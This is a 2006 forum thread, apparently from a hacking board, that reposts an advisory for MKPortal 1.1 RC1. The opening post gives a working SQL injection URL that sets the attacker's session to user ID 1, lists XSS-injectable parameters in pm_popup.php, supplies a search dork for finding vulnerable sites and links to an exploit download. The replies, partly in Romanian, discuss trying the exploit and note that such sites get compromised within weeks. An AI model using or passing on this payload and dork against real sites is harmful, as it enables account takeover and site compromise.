Bigojey Posted July 7, 2006 Report Share Posted July 7, 2006 i got this exploit from a friend. his name is Mustafa Can Bjorn but everybody knows him as nukedx ps: i dont know if this exploit was given before so dont be angry pls if you already know this exploit here's the exploit :Vendor: MKPortal (http://www.mkportal.it/)Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)About: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal.Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy toby pass this SQL update function.Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly.Level: Critical---How&Example: SQL Injection :GET -> http://[victim]/[mkportaldir]/index.php?ind=EXAMPLE -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1.XSS:GET -> [url]http://[victim]/[/url][mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]---Timeline:* 21/04/2006: Vulnerability found.* 21/04/2006: Contacted with vendor and waiting reply.---Exploit:http://www.nukedx.com/?getxpl=26---Dorks: "MKPortal 1.1 RC1"---Original advisory can be found at: http://www.nukedx.com/?viewdoc=26 Quote Link to comment Share on other sites More sharing options...
Screech Posted July 7, 2006 Report Share Posted July 7, 2006 mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers-----------------------fuck, u are not a romanian boy , i say this:i`ve try this exploit but no work for me Quote Link to comment Share on other sites More sharing options...
Bigojey Posted July 7, 2006 Author Report Share Posted July 7, 2006 <div class='quotetop'>QUOTE("Xavier")</div>mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers-----------------------fuck, u are not a romanian boy  , i say this:i`ve try this exploit but no work for me pls in english german or espanol i hope it isnt such negativsentence Quote Link to comment Share on other sites More sharing options...
nos Posted July 7, 2006 Report Share Posted July 7, 2006 e vechi ma e vechi Quote Link to comment Share on other sites More sharing options...
ghici Posted July 7, 2006 Report Share Posted July 7, 2006 ce inseamna nos la tine vechi? Quote Link to comment Share on other sites More sharing options...
nos Posted July 7, 2006 Report Share Posted July 7, 2006 dupa 2 saptamani se invecheste un exploit.cel putin dupa spusele mele dupa 2 saptamani toate site-urile de tipu asta sunt sparte...... Quote Link to comment Share on other sites More sharing options...